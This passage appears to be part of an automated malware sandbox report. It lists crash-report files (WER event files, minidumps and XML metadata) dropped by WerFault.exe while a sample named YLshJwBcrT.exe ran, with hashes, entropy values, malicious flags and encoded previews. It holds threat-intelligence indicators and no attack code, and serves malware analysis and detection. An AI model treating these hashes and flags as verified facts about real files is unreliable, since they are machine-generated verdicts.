                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.6.3.3.4.9.2.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.6.4.1.b.0.f.-.c.0.6.5.-.4.d.0.c.-.b.a.0.1.-.4.8.5.6.3.7.7.2.9.b.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.b.b.6.a.3.5.-.7.7.0.6.-.4.4.e.4.-.a.1.1.d.-.b.6.6.b.4.a.e.b.8.9.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8893233814974209
                                Encrypted:false
                                SSDEEP:96:I4b1hgMZssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUt2:I2Zs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:34D7822FC8BD47720DC8440CF27E00FC
                                SHA1:6ED7F8B1DA537B6FB1F263396B3D9ED5FE6743B3
                                SHA-256:2C95F1103C0DF35660DE53E1C2D08A6C7756575F8BCD1F744F9C28A98DED11BF
                                SHA-512:17C9F97AB6E3A8D02B9D750F395CDEF0E394DF0659F810098A5BC39FC7E468A821F61AEF51A8E23B207C6F7BC5050727C3005B7BA24C6C0471518B0DF836BB23
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.8.0.9.8.8.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.0.3.1.6.b.c.-.6.5.5.b.-.4.c.0.e.-.b.2.b.1.-.6.0.0.6.5.3.f.e.f.6.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.f.a.b.7.0.e.-.8.5.2.4.-.4.7.e.0.-.9.b.2.5.-.0.a.0.e.8.c.6.4.b.b.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8892365258043337
                                Encrypted:false
                                SSDEEP:96:hErLHAShgMqssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2U:agEqs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:02A1213BC63AF8DE462BE84358C66072
                                SHA1:CB6A5A826F766A999311CFA48BCD2D43739BBDA6
                                SHA-256:5680B79495132FA0B9D9EAE7034B4B189B386F7E7836A82A0055C4A6DAE83B2F
                                SHA-512:287EBF91AD64A5B4A44B6E1783CA2DEECB0C45804860FE160A5062872E568D80754492B39274920410C2000D9DA82B3AB8596950027EB4646605223B221EE1E1
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.5.5.2.5.2.4.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.d.b.1.6.e.e.-.3.7.1.a.-.4.2.e.c.-.9.5.8.9.-.4.b.d.8.b.7.1.9.8.4.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.8.7.0.a.c.6.-.e.d.d.e.-.4.b.6.7.-.8.e.a.c.-.f.3.e.b.3.7.d.8.9.5.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.911592997644169
                                Encrypted:false
                                SSDEEP:96:+81/hgMcssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUt8:dHcs3056rQjuSZr+duzuiFFZ24IO8e
                                MD5:4D0E311C2E0A0F3E22DF1C024A9DB9BC
                                SHA1:06BEAC9DBA475D35C0969CE0D763847406C6A0F7
                                SHA-256:1CDD663BAE4BE466EE95C150258DDA4FFE60FEA022783C89623EEB4C2B6EFBCC
                                SHA-512:426F07BB3DA4992F6C66ED622909DC46FB3E9167C169CBD131774C78C4EFDEF55A16EBF6CBF1F8178ECC1DC22DFA68D1201D1FAB1E6961C5908BEBFFC51B48DB
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.8.7.9.3.2.6.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.a.3.3.7.f.c.-.e.5.7.a.-.4.f.1.6.-.9.8.4.3.-.9.b.6.8.0.b.c.1.4.0.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.5.1.4.5.4.-.e.6.5.7.-.4.b.7.8.-.b.0.1.3.-.9.4.2.9.d.5.9.6.d.c.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9380433644437222
                                Encrypted:false
                                SSDEEP:96:lHZfhgMZssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUto:rZs3056rQjuSZr+d+zuiFFZ24IO8e0
                                MD5:A4101922B8791211396859B71DE52B55
                                SHA1:3E7491088BA596997E8C1FAC001241686F2D7C1B
                                SHA-256:62281210083D87DE6E91759263783C79F579B881323DBFA4B4A80B01A6C38B8D
                                SHA-512:A016BB7271054FD3885E23222303784597C1D98270093240431A489B0962B4190BF0A83E13A7D232901286487697F006C448FF111FE212E7305C0167DD7C98AF
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.9.9.5.2.1.7.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.a.c.f.3.1.0.-.1.1.c.0.-.4.3.8.e.-.b.1.e.c.-.9.9.0.f.e.d.9.4.6.3.8.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.6.2.8.7.1.3.-.c.a.4.5.-.4.4.b.8.-.8.7.3.f.-.6.2.f.0.e.e.a.4.9.5.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8893824070714853
                                Encrypted:false
                                SSDEEP:96:hN5hgMTssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUtZr:7hTs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:0AE1A734D360A72CBAA7A339C02AB8E2
                                SHA1:571209FCDA66C184A4EF2DA0DCC8C3D792C96F10
                                SHA-256:F95A9DE32FEB93EB390C4E7C7A0B2FFD9A17F2C1CFE6760866949EFE2043B0BB
                                SHA-512:25151B1F5606ED49FB1914D1C5CF88054D99D3F0891751E49C63AC502A6B9BC0324CD071C49548078C817CFE91157606174ED358103BCA233DCD49B9E90EB1F9
                                Malicious:true
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.7.4.4.8.9.1.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.2.f.f.b.a.c.-.6.f.5.0.-.4.a.c.d.-.8.c.1.e.-.b.0.b.3.d.3.b.0.f.6.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.7.f.1.a.1.5.-.1.7.a.f.-.4.1.7.0.-.9.f.3.f.-.e.b.3.5.a.a.9.d.7.c.c.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9561350438026262
                                Encrypted:false
                                SSDEEP:192:U6Qsi0uDwmaxdjuSZr+dQzuiFIZ24IO8L:DDp8OxdjOyzuiFIY4IO8L
                                MD5:8F4CD5785A6E5DF50374D854F0403D6B
                                SHA1:7502310CA0F0DB4FC3D08168D1971586EEB080D9
                                SHA-256:C5EFD180460B78F4866B15EDE14F6B85A93F71C831D896F294778067EE181EFB
                                SHA-512:BC11E0E7349364D843CE13B54EFF7592D0585B6C6D31D83795186807C666D0A9CBA05A02AC807B03A22C546E6EAC22C9057B8F5BD0630BDFA2D55194281B9A96
                                Malicious:true
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.7.3.1.4.1.1.4.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.3.8.4.7.3.3.9.1.1.5.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.3.2.1.e.8.5.-.e.b.8.d.-.4.5.a.0.-.b.a.1.9.-.a.8.f.b.1.f.8.7.f.3.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.2.1.e.e.6.e.-.e.d.f.3.-.4.3.1.9.-.9.3.d.c.-.e.3.5.4.5.2.3.0.1.c.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:05 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):85424
                                Entropy (8bit):1.821248478400989
                                Encrypted:false
                                SSDEEP:384:/o0CbnQoAEzWo3HIIB/53wBBm5FYjD/z0JOCGFgi:/5C7QoAEKov3wTjD/z0Q2i
                                MD5:B1EFF40D68B98BCC2E14EAEAD13E6595
                                SHA1:D95F71ACBA1AB0AFB117FD54078E7E40FB432B8E
                                SHA-256:95B2C558E3C7FC6EEB2A5586C0B7F502F8A9D82D9FA23A102D048DE8C1366085
                                SHA-512:A0000595D12C87518EA7F6D18799ABBC3CDCB4DA37D201EE02143771B5AB8662F57CE7D6F22FCFAA26FA2D6D21221FE5EDDA67BC15E3A0158B3D905DEC53DC36
                                Malicious:false
                                Preview:MDMP..a..... .......A..g.........................................0..........T.......8...........T................-......................................................................................................eJ......d.......GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.705048448680475
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMc696YEIaSU4/d5gmfDFpBB89bsisfukm:R6lXJH696YEFSU4/zgmfDkshfU
                                MD5:64B1446AC8B9BA0D7BD07D42C79E6A78
                                SHA1:AF1B372732E3EDC9E9841FD433E9E5DA2C29BD21
                                SHA-256:86338A793DE39F04CF51C0B7C42C53FD5E4E1572C5C31F640E0F4E9476D13DBA
                                SHA-512:EEBE991584CAB35F59570AACEDBEF105018887F8DDAD432DF7F6EAAA042CC6DDDA679C9D27429BF81794E5731B2076906E89077633C83E6CBCB03F42510CAB8B
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491052723421616
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYkPfYm8M4J/HFP+q8vG0eRYld:uIjfjI7qO7Vt6JhK/SYld
                                MD5:D2226A0F2D73646953F3E968DEF56B0A
                                SHA1:15EF5F1EC8E664CA00373DF05FBB0501B5D6856E
                                SHA-256:CD13CCA20A3B97260B375CC229D2668D8DBECD77C62837DDC39B73978E47E268
                                SHA-512:475F61EF08275661686417D38F65470CA08E4A968DE97E58F838C078D1F9981AF3D0CED8A8CB9C21E35523041D43DC617C3B62673FB9449781E7CE24C1A918C2
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:06 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):85316
                                Entropy (8bit):1.8424448354245986
                                Encrypted:false
                                SSDEEP:384:7x0CbnNAEptmi3HErIF/qgGBBm5FYjD/z0J/zOP8WnBg:WC7NAEDP0GGTjD/z0Ejn
                                MD5:BB14CDC1D07C3ADDEC9C54859D5360F1
                                SHA1:96A10691CA06883BAD22C47B9BCD734CB4675033
                                SHA-256:8FF2615C5A5DF4900994FCC3DFE2AC5F4AE80741FDD636AA69F4B79B2B5E4E82
                                SHA-512:29BFAA6563E001B0843BF3D270156E93DD797091CBF5659EB9A939454610F99012810ACEE727C541A3B71C2FDDFE81DD07F2E19A80240C95ADA65C66C87A38DC
                                Malicious:false
                                Preview:MDMP..a..... .......B..g.........................................0..........T.......8...........T...........h ...,......................................................................................................eJ......d.......GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.703715785660609
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMp6w6YEIkFSU4/d5gmfDFpB989bnisfTNm:R6lXJS6w6YEJFSU4/zgmfDgnhf0
                                MD5:C2E37FFA62756CB2AD5CA4CCD4E57F6A
                                SHA1:EBBC6EE58EB5EDB3A074AA044E34BFDBEF9DBFAC
                                SHA-256:5BB7095D16EAF6E4AB30E482D06217CB4CBC0294674791FF9846904C756C6EC8
                                SHA-512:7DB1280F0F4EAF60E90B18EAA37DF9144C9B195A5A4A8F4EF4ADB67B3FAA9A4EF07158B9C775720FB42F8CE740C4188D8BEA24395ECF3E95D0560C374169F45A
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491060380266267
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYFYm8M4J/HFd3V+q8vG0eRYld:uIjfjI7qO7VRJJK/SYld
                                MD5:4B562C3FE75721C9DE12C5B497B24855
                                SHA1:C6BA278AFA061A25473F661271ED056A069A3EE4
                                SHA-256:E9DF626439F50C7746CF12E93566CD5DE1B2B14B0A18E1BA7E1AC419A5933EC0
                                SHA-512:4BE549D4D76E3055254487D2CC11285699FA74CDCA53AA285F0EA906FE7DF45BF6E9C12AF17CAD6E82191244C1ECDC952008CFAC3F5959FC40BFFC48ABA082B9
                                Malicious:false
